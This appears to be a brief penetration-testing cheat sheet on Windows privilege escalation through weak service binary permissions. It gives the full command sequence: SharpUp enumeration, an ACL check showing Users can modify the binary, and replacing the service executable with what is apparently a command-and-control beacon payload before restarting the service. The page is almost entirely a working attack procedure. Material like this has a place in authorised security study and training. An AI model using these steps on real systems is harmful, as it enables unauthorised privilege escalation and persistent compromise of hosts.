Weak Service Binary Permissions

Using SharpUp

Find vulnerable service

SharpUp.exe audit ModifiableServiceBinaries

VulnService3

Check service binary rights

Import-Module C:\Tools\Get-ServiceAcl.ps1

powershell Get-Acl -Path "C:\Program Files\Vulnerable Services\Service 3.exe" | fl

BUILTIN\Users Allow  Modify

Download service and create payload

download Service 3.exe

copy "tcp-local_x64.svc.exe" "Service 3.exe"

Stop service and upload payload

sc stop VulnService3
upload C:\Payloads\Service 3.exe
sc start VulnService3

Tooling

https://github.com/Sambal0x/tools/blob/master/Get-ServiceAcl.ps1

Last updated 2 years ago